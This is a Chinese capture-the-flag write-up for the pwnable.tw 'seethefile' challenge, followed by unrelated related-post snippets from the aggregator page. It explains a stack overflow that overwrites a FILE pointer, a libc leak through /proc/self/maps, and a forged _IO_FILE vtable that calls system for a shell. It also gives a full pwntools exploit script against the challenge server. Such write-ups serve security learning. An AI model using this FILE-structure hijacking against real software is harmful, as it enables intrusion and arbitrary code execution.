pwnable.tw 9 seethefile [250 pts]

阿新 • • 發佈：2018-12-13

之前做了五道題直接做自閉了，各種手寫shellcode，學到了很多姿勢，這是一道檔案題，沒接觸過，來挑戰一下……

no canary found!!!!!! 拖進IDA分析

一共有五個功能

有一個明顯的棧溢位

我們可以通過溢位name來覆蓋fp

1）openfile：開啟檔案，檔案指標就是fp，不能開啟檔名為flag的檔案

2）readfile：從fp讀取0x18F個位元組到magicbuf上

3）closefile：關閉檔案，指標fp賦0

4）writefile：只是一個列印函式，而不能寫入，不能列印flag,FLAG,}名的檔案，如下

思路就是構造fake FILE，從而使得接下來的fclose執行system(“/bin/sh”)

一開始也不知到咋洩露libc內容

後來看了這篇文章：http://p4nda.top/2017/09/20/pwnable-tw-seethefile/

原來檔案的記憶體資訊儲存與/proc/pid/maps中

遠端一下試試看

還行，可以看見，我們需要的是libc_address的偏移量，然後找出system_address

我們還需要學會怎麼偽造IO_File，頭疼，又是沒接觸過的

學習連結：https://www.jianshu.com/p/2e00afb01606

https://www.jianshu.com/p/a6354fa4dbdf

提幾個偷懶的知識點好了：

1._IO_FILE結構體大小為0x94，我的版本是這個，查一下就好，只需要改掉有用的

2._flags & 0x2000為0就會直接呼叫_IO_FINSH(fp)，_IO_FINISH(fp)相當於呼叫fp->vtabl->__finish(fp)

3.將fp指向一塊記憶體P，P偏移0的前4位元組設定為0xffffdfff，P偏移4位置放上要執行的字串指令（字串以';'開頭即可），P偏移sizeof(_IO_FILE)大小位置（vtable）覆蓋為記憶體區域Q，Q偏移2*4位元組處(vtable->__finish)覆蓋為system函式地址即可

4.vtable是個虛標指標，裡面一般性是21or23個變數，我們需要改的是第三個，別的填充些正常的地址就好

exp

#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']

local = 0

if local:
	cn = process('./seethefile')
	bin = ELF('./seethefile')
	#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
	libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
else:
	cn = remote('chall.pwnable.tw',10200)
	bin = ELF('./seethefile')
	libc = ELF('libc_32.so.6')


def z(a=''):
	gdb.attach(cn,a)
	if a == '':
		raw_input()

def openfile(name):
    cn.recvuntil('Your choice :')
    cn.sendline('1')
    cn.recvuntil('to see :')
    cn.sendline(name)


def readfile():
    cn.recvuntil('Your choice :')
    cn.sendline('2')

def writefile():
    cn.recvuntil('Your choice :')
    cn.sendline('3')

def closefile():
    cn.recvuntil('Your choice :')
    cn.sendline('4')

def exit(name):
    cn.recvuntil('Your choice :')
    cn.sendline('5')
    cn.recvuntil('your name :')
    cn.sendline(name)

openfile('/proc/self/maps')
readfile()
writefile()
cn.recvline()
cn.recvline()
cn.recvline()
cn.recvline()
libc.address = int(cn.recvline()[:8],16)+0x1000
print 'offset: '+hex(libc.address)
system_addr=libc.symbols['system']
print 'system: '+hex(system_addr)
closefile()

openfile('/proc/self/maps')
#spare place
addr=0x0804B300
payload=''
#padding+change *fp
payload+='a'*32 + p32(addr)
payload+='\x00'*(0x80-4)
#fake IO file
#flag+code
payload+='\xff\xff\xdf\xff;$0\x00'.ljust(0x94,'\x00')
#change vtable
payload+=p32(addr+0x98)
payload+=p32(system_addr)*21
exit(payload)

cn.interactive()

pwnable.tw 9 seethefile [250 pts]

之前做了五道題直接做自閉了，各種手寫shellcode，學到了很多姿勢，這是一道檔案題，沒接觸過，來挑戰一下…… no canary found!!!!!! 拖進IDA分析一共有五個功能有一個明顯的棧溢位我們可以通過溢位name來覆蓋fp 1）openfi

【pwnable.tw】 seethefile

get 文件中 fclose 打印 .cn 建議空間變量可控一開始特別懵的一道題。 main函數中一共4個功能，openfile、readfile、writefile、closefile。其中，在最後退出時有一個明顯的溢出，是scanf("%s",&na

Pwnable.tw WP

Pwnable.tw start 我們分析上圖程式的彙編程式碼：上圖中的第一個方框，其實是將： Let's start the CTF: 這句字串壓進棧；第二個方框：其實是 system_write()函式，引數中 fd =1, 說明是標準輸出，也就是

pwnable.tw 心累

聽說很難，來找虐 1.Start [100 pts] 之前湖湘杯有一題啥防護措施都沒開啟，我就不會做，所以不敢開心的太早拖進IDA，這啥東西還是直接看彙編吧這是個系統呼叫大概就是系統中斷之後直接呼叫吧，邊上有註釋，不然我直接涼了來，看一下彙編

pwnable.tw第一題start

這應該是我做的第一道pwn的題了（雖然也是看了很多別人的WriteUp）,想了兩天，才終於弄清楚了，在這裡記錄一下。拿到手以後發現是一個ELF檔案，就放進kali虛擬機器裡面執行一下先：程式啟動以後列印一段話，然後讓你輸入，就完事了。再放入IDA

pwnable.tw calc

構造 inf bsp 棧空間 ESS 根據計算器 com 字符先把漏洞分析了吧，利用明天再寫題目代碼量比較大（對於菜雞我來說orz），找了很久才發現一個能利用的漏洞運行之發現是一個計算器的程序，簡單測試下發現當輸入的操作數超過10位時會有一個整型溢出這裏調試

pwnable.tw hacknote

void oid get odi word amp The dword gnu 產生漏洞的原因是free後chunk未置零 unsigned int sub_80487D4() { int index; // [esp+4h] [ebp-14h] cha

pwnable.tw silver_bullet

contex new The pre puts sil esp bin 記錄產生漏洞的原因 int __cdecl power_up(char *dest) { char s; // [esp+0h] [ebp-34h] size_t new_len;

18.9.17 pwnable.kr----collision

同樣的操作，找到c的原始碼用(int*)強制轉換，然後賦給給ip，ip的錢五個值的和等於res 剛開始我們要輸入20個位元組（強制轉換成int型後，正好分成了五組）執行check_password之後返回的值要等與0x21DD09EC 上指令碼（參考了大佬的）

java編程思想第四版第9章

art new end strac override @override err private over 練習3： public class MainTest { public static void main(String args

February 26 2017 Week 9 Sunday

ngs mos only fin who ood use hot rem There is only one happiness in life, to love and be loved. 生命中只有一種幸福，愛與被愛。 Some one told me that hea

Java 9 中的 9 個新特性

不想行為添加元素 ase 結合 quest 簡單通過 this Java 8 發布三年多之後，即將快到2017年7月下一個版本發布的日期了。你可能已經聽說過 Java 9 的模塊系統，但是這個新版本還有許多其它的更新。這裏有九個令人興奮的新功能將與 Java 9

Wamp2.5(Apache2.4.9)外網訪問403(Forbidden)錯誤

his 403錯誤 require director off nat from 原因 spa 把wamp配置到Azure上之後，倒騰好久都沒有解決403錯誤問題，網上百度了很多資料，差不多都是這樣修改的： 1、在C:wamp/bin/apache/apache2.4.9/c

九個令人興奮的新功能將與Java 9 展示兩點

java googl pre api ogl body 特性 gen 大神 HTTP/2 Java 9 中有新的方式來處理 HTTP 調用。這個遲到的特性用於代替老舊的 `HttpURLConnection` API，並提供對 WebSocket 和 HTTP/2 的支持。

JavaScript面向對象編程（9）高速構建繼承關系之整合原型鏈

eight family per ria code prot style triangle super 前面我們鋪墊了非常多細節。是為了讓大家更加明晰prototype的使用細節；如今能夠將前面的知識整合起來，寫一個函數用於高速構建基於原型鏈的繼承關系了： funct

February 28 2017 Week 9 Tuesday

ons enc 感受 there eno better between eas about Time you enjoy wasting, was not wasted. 你樂於揮霍的時間，都不能算作是浪費。 A few days ago, I learned a sent

[3 Jun 2015 ~ 9 Jun 2015] Deep Learning in arxiv

with center spa multi only vol them res multipl arXiv is an e-print service in the fields of physics, mathematics, computer science, qu

Fuel 9.0 部署Openstack Mitaka詳細

fuel-9.0 openstack 漫漫求索Openstack路---Fuel 9.0 部署Openstack Mitaka詳細（排坑版）0、前言不想搭建環境，官方提供測試Fuel 9.0的demo環境 http://demo.fuel-infra.org:8000（只要你電腦能上外網）默認用戶名、

March 2 2017 Week 9 Thursday

unit air lar ati first who ever listening sting The first duty of love is to listen. 愛的首要責任是傾聽。 Yesterday, I read an article that says a

七. 多線程編程9.線程間通信

程序 tro 討論結束 ava 排隊被調用 clas www 上述例題無條件的阻塞了其他線程異步訪問某個方法。Java對象中隱式管程的應用是很強大的，但是你可以通過進程間通信達到更微妙的境界。這在Java中是尤為簡單的。像前面所討論過的，多線程通過把任務分成離散的和合乎

pwnable.tw 9 seethefile [250 pts]

相關推薦